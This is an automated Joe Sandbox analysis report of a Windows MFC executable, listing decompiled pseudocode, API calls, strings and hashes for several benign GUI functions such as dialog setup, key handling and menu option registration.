Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: E-mail$Explore$None$Open$Print$User defined$WE$WE$WE
API String ID: 4256512136-2572353929
Opcode ID: 79a2b1d5260f91db78b2ce4fb80641d1ad0318c7dedf8a01b0791cac9b9acef3
Instruction ID: 930db563bb041013439e8ef62466512621752000733374109630c874ba7bf5c8
Opcode Fuzzy Hash: 79a2b1d5260f91db78b2ce4fb80641d1ad0318c7dedf8a01b0791cac9b9acef3
Instruction Fuzzy Hash: DED0AC04F40E41D64524BF66E43357D9946CB9C7C7F50A15FBD021E2D38D4C4A5C452D

Uniqueness

Uniqueness Score: -1.00%

Function 0040CD7D, Relevance: 26.3, APIs: 6, Strings: 9, Instructions: 19
COMMON

Download Yara Rule

C-Code - Quality: 42%

			E0040CD7D(void* __eax) {

				_push("None");
				L0043DE26();
				_push("User defined");
				L0043DE26();
				_push("Open");
				L0043DE26();
				_push("Print");
				L0043DE26();
				_push("Explore");
				L0043DE26();
				_push("E-mail");
				L0043DE26();
				return __eax;
			}

0x0040cd7d
0x0040cd87
0x0040cd8c
0x0040cd96
0x0040cd9b
0x0040cda5
0x0040cdaa
0x0040cdb4
0x0040cdb9
0x0040cdc3
0x0040cdc8
0x0040cdd2
0x0040cdd7

APIs

#537.MFC42(None,0040CD78), ref: 0040CD87
#537.MFC42(User defined,None,0040CD78), ref: 0040CD96
#537.MFC42(Open,User defined,None,0040CD78), ref: 0040CDA5
#537.MFC42(Print,Open,User defined,None,0040CD78), ref: 0040CDB4
#537.MFC42(Explore,Print,Open,User defined,None,0040CD78), ref: 0040CDC3
#537.MFC42(E-mail,Explore,Print,Open,User defined,None,0040CD78), ref: 0040CDD2

Strings

$SE, xrefs: 0040CDBE
Open, xrefs: 0040CD9B
E-mail, xrefs: 0040CDC8
Explore, xrefs: 0040CDB9
(SE, xrefs: 0040CDCD
Print, xrefs: 0040CDAA
User defined, xrefs: 0040CD8C
SE, xrefs: 0040CDAF
None, xrefs: 0040CD7D

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #537
String ID: SE$$SE$(SE$E-mail$Explore$None$Open$Print$User defined
API String ID: 4256512136-2345762246
Opcode ID: b8a559c35734eb45d14b4dfc9f20b6bf4b0adfd2e2b4e46f76fc9921699c5edc
Instruction ID: da5d5db970de4c682cb833db9293b34621f818dda07f35ad23db7220c8c188ac
Opcode Fuzzy Hash: b8a559c35734eb45d14b4dfc9f20b6bf4b0adfd2e2b4e46f76fc9921699c5edc
Instruction Fuzzy Hash: B5D0AC00F50E41D549147E65E43353D5842C79C7C7790A16F7D061E1D38DCC4A1C452D

Uniqueness

Uniqueness Score: -1.00%

Function 00426DEC, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 142
stringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E00426DEC(void* __ecx) {
				void* __ebx;
				void* __edi;
				void* __esi;
				CHAR* _t52;
				CHAR* _t55;
				void* _t70;
				intOrPtr _t72;
				void* _t80;
				void* _t120;
				void* _t122;
				void* _t130;

				_t52 = E0043E4E0(0x442c24, _t122);
				_t120 = __ecx;
				if( *((char*)(__ecx + 0x17f5)) != 0 ||  *((char*)(__ecx + 0x17f6)) != 0) {
					if(( *0x4558e4 & 0x00000001) != 0) {
						_t80 = 0x4558d0;
					} else {
						 *0x4558e4 =  *0x4558e4 | 0x00000001;
						_t80 = 0x4558d0;
						E0042835B(0x4558d0, 0, 1);
						E0043E560(E00426FEC);
					}
					_t112 = _t120 + 0x78;
					_t130 =  *0x455ae4 - E004208D3(_t120 + 0x78); // 0x0
					if(_t130 != 0) {
						E0042848B(_t80);
						 *0x455ae4 = E004208D3(_t112);
					}
					L0043E45C();
					 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
					_push(E004208CC(_t112));
					L0043E48C();
					_t52 =  *(_t122 - 0x24);
					if(_t52 - 1 == 0xffffffff) {
						L16:
						 *(_t122 - 4) =  *(_t122 - 4) | 0xffffffff;
						L0043E450();
						goto L17;
					} else {
						_push(0);
						_push(_t52);
						L0043E462();
						_t55 =  *(_t122 - 0x28);
						 *(_t122 - 0x18) = _t55;
						_t52 = CharLowerA(_t55);
						 *(_t122 - 0x10) = 0;
						if( *((intOrPtr*)(_t120 + 0x16b4)) <= 0) {
							goto L16;
						} else {
							goto L9;
						}
						do {
							L9:
							_t115 = _t120 + 0x1204;
							lstrcpyA(_t122 - 0x12c, E0042855C(_t120 + 0x1204,  *(_t122 - 0x10)));
							CharLowerA(_t122 - 0x12c);
							if(E004284C0(_t80, _t122 - 0x12c) == 0 && strstr( *(_t122 - 0x18), _t122 - 0x12c) != 0) {
								E004283A6(_t80, _t122 - 0x12c);
								if( *((char*)(_t120 + 0x17f6)) != 0) {
									E004250CC(_t120, _t120);
								}
								if( *((char*)(_t120 + 0x17f5)) != 0) {
									_push(_t120 + 0x16b8);
									L0041E33B(_t120 + 0x16b8, _t120 + 0x276c, _t115, _t120);
									_push(E0042855C(_t115,  *(_t122 - 0x10)));
									L0043DDD2();
									_t70 = E004208CC(_t120 + 0x78);
									_t72 =  *((intOrPtr*)(E004208CC(_t120 + 0x78) + 4));
									_push( *((intOrPtr*)(_t70 + 8)) - 1 + 1);
									_push(_t72);
									L0043DFDC();
									_push(_t72);
									 *(_t122 - 4) = 1;
									L0043DFCA();
									 *(_t122 - 4) =  *(_t122 - 4) & 0x00000000;
									L0043DD36();
									 *(_t120 + 0x37dc) =  *(_t120 + 0x37dc) & 0x00000000;
									E00427544(_t120 + 0x276c);
									_t80 = 0x4558d0;
								}
							}
							 *(_t122 - 0x10) =  &(( *(_t122 - 0x10))[1]);
							_t52 =  *(_t122 - 0x10);
						} while (_t52 <  *((intOrPtr*)(_t120 + 0x16b4)));
						goto L16;
					}
				} else {
					L17:
					 *[fs:0x0] =  *((intOrPtr*)(_t122 - 0xc));
					return _t52;
				}
			}

0x00426df1
0x00426dfe
0x00426e08
0x00426e1e
0x00426e44
0x00426e20
0x00426e20
0x00426e27
0x00426e32
0x00426e3c
0x00426e41
0x00426e49
0x00426e53
0x00426e59
0x00426e5d
0x00426e69
0x00426e69
0x00426e71
0x00426e76
0x00426e81
0x00426e85
0x00426e8a
0x00426e93
0x00426fd1
0x00426fd1
0x00426fd8
0x00000000
0x00426e99
0x00426e9e
0x00426e9f
0x00426ea0
0x00426ea5
0x00426ea9
0x00426eac
0x00426eb8
0x00426ebb
0x00000000
0x00000000
0x00000000
0x00000000
0x00426ec1
0x00426ec1
0x00426ec4
0x00426ed9
0x00426ee6
0x00426efc
0x00426f25
0x00426f31
0x00426f35
0x00426f35
0x00426f41
0x00426f4f
0x00426f52
0x00426f61
0x00426f68
0x00426f70
0x00426f81
0x00426f85
0x00426f86
0x00426f8a
0x00426f8f
0x00426f96
0x00426f9a
0x00426f9f
0x00426fa6
0x00426fab
0x00426fb5
0x00426fba
0x00426fba
0x00426f41
0x00426fbf
0x00426fc2
0x00426fc5
0x00000000
0x00426ec1
0x00426fdd
0x00426fdd
0x00426fe3
0x00426feb
0x00426feb

APIs

__EH_prolog.LIBCMT ref: 00426DF1
#287.MFC42 ref: 00426E71
#2060.MFC42(00000000), ref: 00426E85
#5857.MFC42(?,00000000,00000000), ref: 00426EA0
CharLowerA.USER32(?,?,00000000,00000000), ref: 00426EAC
lstrcpyA.KERNEL32(?,00000000,?), ref: 00426ED9
CharLowerA.USER32(?), ref: 00426EE6
strstr.MSVCRT ref: 00426F0C
#860.MFC42(00000000,?), ref: 00426F68
#538.MFC42(?,?,00000000,?), ref: 00426F8A
#858.MFC42(00000000,?,?,00000000,?), ref: 00426F9A
#800.MFC42(00000000,?,?,00000000,?), ref: 00426FA6

Part of subcall function 00427544: #1105.MFC42(00426FF6,?,00000000,00000000,00000000,00000000,00426FBA,?), ref: 0042755C

#610.MFC42(00000000), ref: 00426FD8

Strings

$,D, xrefs: 00426DEC

Memory Dump Source

Source File: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: CharLower$#1105#2060#287#538#5857#610#800#858#860H_prologlstrcpystrstr
String ID: $,D
API String ID: 4199240607-2290473225
Opcode ID: 82f30584d9139ae9433c4961c659f99478d964eff8135e6374ef771c13bad6c4
Instruction ID: fcbf78a614c8e22cc27cbc8bea8d7621adb7ae57c6e2156843f2ebfafb0219d9
Opcode Fuzzy Hash: 82f30584d9139ae9433c4961c659f99478d964eff8135e6374ef771c13bad6c4
Instruction Fuzzy Hash: 09510370A016159BDF15EB71E895BEFB7B8EF48308F40042FE016A3192DB386E49CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0040EA76, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 140
windowCOMMON

Download Yara Rule

C-Code - Quality: 26%

			E0040EA76(void* __ecx) {
				struct tagRECT _v116;
				void* __esi;
				long _t35;
				void* _t36;
				void* _t37;
				void* _t38;
				void* _t59;
				void* _t60;
				void* _t79;
				void* _t81;

				_t81 = __ecx;
				 *((intOrPtr*)(__ecx + 0x268)) =  *((intOrPtr*)( *((intOrPtr*)(__ecx + 0x64)) + 0x68c));
				L0043DF94();
				_t35 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t81 + 0xb8) = _t35;
				 *((intOrPtr*)(_t81 + 0xb0)) = 0x2bc;
				 *((intOrPtr*)(_t81 + 0xac)) = 0xe;
				L0043DDD2();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t81);
				_push(1);
				_t36 = L00404F47(_t35, _t81 + 0xd8, _t81);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t81);
				_push(2);
				_t37 = L00404F47(_t36, _t81 + 0x12c, _t81);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t81);
				_push(0x3e8);
				_t38 = L00404F47(_t37, _t81 + 0x180, _t81);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t81);
				_push(0x3e9);
				L00404F47(_t38, _t81 + 0x1d4, _t81);
				GetWindowRect( *(_t81 + 0x248),  &_v116);
				_push(0xffffffff);
				_push(_v116.right - _v116.left - 5);
				_push(0);
				_push(0x4550cc);
				_push(0);
				L0043DF8E();
				_t47 = L004044C9(SendMessageA( *(_t81 + 0x248), 0x1036, 0, 0x521), _t81 + 0x228, _t81) + 0xd50;
				_t79 = 0;
				 *((intOrPtr*)(_t81 + 0x60)) = _t47;
				if( *((intOrPtr*)(_t47 + 0x4b0)) > 0) {
					do {
						_t60 = E0042855C(_t47, _t79);
						_push(0);
						_push(0);
						_push(0);
						_push(0);
						_push(_t60);
						_push(_t79);
						_push(1);
						L0043DF88();
						_t47 =  *((intOrPtr*)(_t81 + 0x60));
						_t79 = _t79 + 1;
					} while (_t79 <  *((intOrPtr*)( *((intOrPtr*)(_t81 + 0x60)) + 0x4b0)));
				}
				_push(0x47a);
				L0043E066();
				SendMessageA( *( *((intOrPtr*)(_t81 + 0x64)) + 0x20), 0x14e,  *( *((intOrPtr*)(_t81 + 0x64)) + 0x358), 0);
				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x13b) & 0x000000ff);
				_push(0x421);
				L0043DF82();
				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x148) & 0x000000ff);
				_push(0x48d);
				L0043DF82();
				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x149) & 0x000000ff);
				_push(0x48e);
				L0043DF82();
				_push( *( *((intOrPtr*)(_t81 + 0x64)) + 0x14a) & 0x000000ff);
				_push(0x48f);
				L0043DF82();
				E0040EC3F( *( *((intOrPtr*)(_t81 + 0x64)) + 0x14a) & 0x000000ff, _t81);
				_t59 = 1;
				return _t59;
			}

0x0040ea7c
0x0040ea88
0x0040ea8e
0x0040ea95
0x0040ea9b
0x0040eaa6
0x0040eaac
0x0040eab6
0x0040eac0
0x0040eaca
0x0040ead1
0x0040ead7
0x0040ead8
0x0040ead9
0x0040eada
0x0040eae2
0x0040eae7
0x0040eae9
0x0040eaea
0x0040eaeb
0x0040eaec
0x0040eaed
0x0040eaf5
0x0040eafa
0x0040eafc
0x0040eafd
0x0040eafe
0x0040eaff
0x0040eb00
0x0040eb0b
0x0040eb10
0x0040eb12
0x0040eb13
0x0040eb14
0x0040eb15
0x0040eb16
0x0040eb21
0x0040eb31
0x0040eb3b
0x0040eb4e
0x0040eb4f
0x0040eb50
0x0040eb55
0x0040eb56
0x0040eb77
0x0040eb7c
0x0040eb7e
0x0040eb87
0x0040eb89
0x0040eb8c
0x0040eb91
0x0040eb92
0x0040eb93
0x0040eb94
0x0040eb95
0x0040eb96
0x0040eb97
0x0040eb9b
0x0040eba0
0x0040eba3
0x0040eba4
0x0040eb89
0x0040ebaf
0x0040ebbc
0x0040ebcb
0x0040ebdd
0x0040ebde
0x0040ebe3
0x0040ebf4
0x0040ebf5
0x0040ebfa
0x0040ec0b
0x0040ec0c
0x0040ec11
0x0040ec22
0x0040ec23
0x0040ec28
0x0040ec2f
0x0040ec36
0x0040ec3e

APIs

#4710.MFC42 ref: 0040EA8E
GetSysColor.USER32(0000000F), ref: 0040EA95
#860.MFC42 ref: 0040EAC0
GetWindowRect.USER32 ref: 0040EB31
#3996.MFC42(00000000,004550CC,00000000,?,000000FF,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EB56
SendMessageA.USER32(?,00001036,00000000,00000521), ref: 0040EB6C
#3998.MFC42(00000001,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040EB9B
#3092.MFC42(0000047A,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EBBC
SendMessageA.USER32(?,0000014E,?,00000000), ref: 0040EBCB
#1779.MFC42(00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080), ref: 0040EBE3
#1779.MFC42(0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF), ref: 0040EBFA
#1779.MFC42(0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101,00808080,00000001), ref: 0040EC11
#1779.MFC42(0000048F,?,0000048E,?,0000048D,?,00000421,?,?,00EFEFEF,00010101,00808080,00000001,?,00EFEFEF,00010101), ref: 0040EC28

Strings

Verdana, xrefs: 0040EA9B

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #1779$MessageSend$#3092#3996#3998#4710#860ColorRectWindow
String ID: Verdana
API String ID: 3503195851-987297809
Opcode ID: adf625c923e6a342d17d9bf64f87da7b644619d3b40200c7d210e334a5b75756
Instruction ID: 7e416f1695c23d7257579fcbb30e3f54af0e13ee50486b246f79fdcfb8abc44c
Opcode Fuzzy Hash: adf625c923e6a342d17d9bf64f87da7b644619d3b40200c7d210e334a5b75756
Instruction Fuzzy Hash: 9741B8703007047FD220AB66CC86FBB7BECEF85748F01046EB69A972D2CAB579448765

Uniqueness

Uniqueness Score: -1.00%

Function 00419F1D, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 99
windowCOMMON

Download Yara Rule

C-Code - Quality: 36%

			E00419F1D() {
				void* __ecx;
				void* __esi;
				void* _t19;
				void* _t20;
				void* _t21;
				long _t23;
				void* _t30;
				void* _t33;
				void* _t48;
				void* _t51;

				_t48 = _t33;
				L0043DF94();
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(1);
				_t20 = L00404F47(_t19, _t48 + 0x138, _t48);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(2);
				_t21 = L00404F47(_t20, _t48 + 0xe4, _t48);
				_push(1);
				_push(0x808080);
				_push(0x10101);
				_push(0xefefef);
				_push(_t48);
				_push(0xe005);
				L00404F47(_t21, _t48 + 0x18c, _t48);
				_t23 = GetSysColor(0xf);
				_push("Verdana");
				 *(_t48 + 0xb8) = _t23;
				 *((intOrPtr*)(_t48 + 0xb0)) = 0x2bc;
				 *((intOrPtr*)(_t48 + 0xac)) = 0xe;
				L0043DDD2();
				_push( *((intOrPtr*)(_t48 + 0x60)));
				L0043E15C();
				_push(0x43e);
				L0043E066();
				_push(0x43f);
				L0043E066();
				_push(0x438);
				 *(_t51 + 0x14) = _t23;
				L0043E066();
				 *(_t51 + 0x20) = _t23;
				SendMessageA( *(_t23 + 0x20), 0xcc, 0x2a, 0);
				SendMessageA( *( *((intOrPtr*)(_t51 + 0x10)) + 0x20), 0xcc, 0x2a, 0);
				SendMessageA( *( *(_t51 + 0x14) + 0x20), 0xcc, 0x2a, 0);
				if( *((intOrPtr*)( *((intOrPtr*)(_t48 + 0x64)) - 8)) == 0) {
					_push(0);
					L0043E07E();
					_push(0);
					_push(0x440);
					L0043E066();
					L0043E07E();
				}
				_t30 = 1;
				return _t30;
			}

0x00419f23
0x00419f25
0x00419f2f
0x00419f36
0x00419f3c
0x00419f3d
0x00419f3e
0x00419f3f
0x00419f47
0x00419f4c
0x00419f4e
0x00419f4f
0x00419f50
0x00419f51
0x00419f52
0x00419f5a
0x00419f5f
0x00419f61
0x00419f62
0x00419f63
0x00419f64
0x00419f65
0x00419f70
0x00419f77
0x00419f7d
0x00419f88
0x00419f8e
0x00419f98
0x00419fa2
0x00419fa7
0x00419fad
0x00419fb2
0x00419fb9
0x00419fbe
0x00419fc7
0x00419fcc
0x00419fd3
0x00419fd7
0x00419fec
0x00419ff3
0x0041a001
0x0041a00f
0x0041a019
0x0041a01b
0x0041a01e
0x0041a023
0x0041a024
0x0041a02b
0x0041a032
0x0041a032
0x0041a039
0x0041a040

APIs

#4710.MFC42 ref: 00419F25
GetSysColor.USER32(0000000F), ref: 00419F77
#860.MFC42 ref: 00419FA2
#6199.MFC42(?), ref: 00419FAD
#3092.MFC42(0000043E,?), ref: 00419FB9
#3092.MFC42(0000043F,0000043E,?), ref: 00419FC7
#3092.MFC42(00000438,0000043F,0000043E,?), ref: 00419FD7
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 00419FF3
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A001
SendMessageA.USER32(?,000000CC,0000002A,00000000), ref: 0041A00F
#2642.MFC42(00000000), ref: 0041A01E
#3092.MFC42(00000440,00000000,00000000), ref: 0041A02B
#2642.MFC42(00000440,00000000,00000000), ref: 0041A032

Strings

Verdana, xrefs: 00419F7D

Memory Dump Source

Source File: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225907145.0000000000453000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225917493.0000000000454000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.225938237.0000000000455000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.225954502.000000000045B000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225975427.0000000000468000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_executable.jbxd

Similarity

API ID: #3092$MessageSend$#2642$#4710#6199#860Color
String ID: Verdana
API String ID: 2639939461-987297809
Opcode ID: fbad95eec72c3054b1a0cc092a9b6a541f5b35b47187590ab61f9493c6e4b239
Instruction ID: 1eb3d388b0cfc98818dfb6084f2405a81ffd7390c4bb3f078a6351e00340efe2
Opcode Fuzzy Hash: fbad95eec72c3054b1a0cc092a9b6a541f5b35b47187590ab61f9493c6e4b239
Instruction Fuzzy Hash: F331C8713417047BE634AB22CC46F6BBAA9EF85B44F00042EB2866B2D1DEF56D44C769

Uniqueness

Uniqueness Score: -1.00%

Function 0040E7FB, Relevance: 24.6, APIs: 13, Strings: 1, Instructions: 78
windowstringCOMMON

Download Yara Rule

C-Code - Quality: 85%

			E0040E7FB(void* __ecx, intOrPtr _a4) {
				char _v16;
				struct HWND__* _t19;
				signed char _t21;
				void* _t27;
				struct HWND__* _t28;
				void* _t30;
				intOrPtr _t32;
				struct HWND__* _t36;
				intOrPtr _t37;

				_t37 = _a4;
				_t30 = __ecx;
				_t32 =  *((intOrPtr*)(_t37 + 4));
				if(_t32 != 0x100) {
					L13:
					_push(_t37);
					L0043E042();
					return 0x100;
				}
				if( *(_t37 + 8) != 0x1b) {
					if(_t32 != 0x100 ||  *(_t37 + 8) != 0xd) {
						goto L13;
					} else {
						_push(GetFocus());
						L0043DD9C();
						_t19 = GetFocus();
						_push(_t19);
						L0043DD9C();
						_t36 = _t19;
						if(_t36 == 0) {
							L12:
							return 0;
						}
						_t21 = IsChild( *(_t30 + 0x20),  *(_t36 + 0x20));
						if(_t21 == 0) {
							goto L12;
						}
						L0043E18C();
						if((_t21 & 0x00000010) == 0 || GetClassNameA( *(_t36 + 0x20),  &_v16, 0xa) == 0 || lstrcmpiA( &_v16, "EDIT") != 0) {
							goto L12;
						} else {
							SendMessageA( *(_t36 + 0x20), 0x102,  *(_t37 + 8),  *(_t37 + 0xc));
							L11:
							_t27 = 1;
							return _t27;
						}
					}
				}
				_t28 = GetParent( *(__ecx + 0x20));
				_push(_t28);
				L0043DD9C();
				PostMessageA( *(_t28 + 0x20), 0x111, 2, 0);
				goto L11;
			}

0x0040e803
0x0040e806
0x0040e80e
0x0040e813
0x0040e8ce
0x0040e8ce
0x0040e8d1
0x00000000
0x0040e8d1
0x0040e81d
0x0040e847
0x00000000
0x0040e853
0x0040e85b
0x0040e85c
0x0040e861
0x0040e863
0x0040e864
0x0040e869
0x0040e86d
0x0040e8ca
0x00000000
0x0040e8ca
0x0040e875
0x0040e87d
0x00000000
0x00000000
0x0040e881
0x0040e889
0x00000000
0x0040e8b1
0x0040e8bf
0x0040e8c5
0x0040e8c7
0x00000000
0x0040e8c7
0x0040e889
0x0040e847
0x0040e822
0x0040e828
0x0040e829
0x0040e83a
0x00000000

APIs

GetParent.USER32(?), ref: 0040E822
#2864.MFC42(00000000), ref: 0040E829
PostMessageA.USER32 ref: 0040E83A
GetFocus.USER32 ref: 0040E859
#2864.MFC42(00000000), ref: 0040E85C
GetFocus.USER32 ref: 0040E861
#2864.MFC42(00000000), ref: 0040E864
IsChild.USER32(?,?), ref: 0040E875
#3797.MFC42 ref: 0040E881
GetClassNameA.USER32(?,?,0000000A), ref: 0040E894
lstrcmpiA.KERNEL32(?,EDIT), ref: 0040E8A7
SendMessageA.USER32(?,00000102,0000000D,?), ref: 0040E8BF
#5280.MFC42(?), ref: 0040E8D1

Strings

EDIT, xrefs: 0040E8A1

Memory Dump Source

Source File: 00000000.00000002.225794652.0000000000409000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.225760151.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225766751.0000000000401000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225780263.0000000000403000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225787087.0000000000406000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225805945.0000000000414000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225814365.0000000000418000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225827911.000000000041F000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225836417.0000000000424000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225848031.000000000042C000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225861065.000000000043D000.00000020.00020000.sdmp Download File
Associated: 00000000.00000002.225868415.0000000000444000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225876800.0000000000446000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.225887743.0000000000450000.00000002.00020000.sdmp Download File
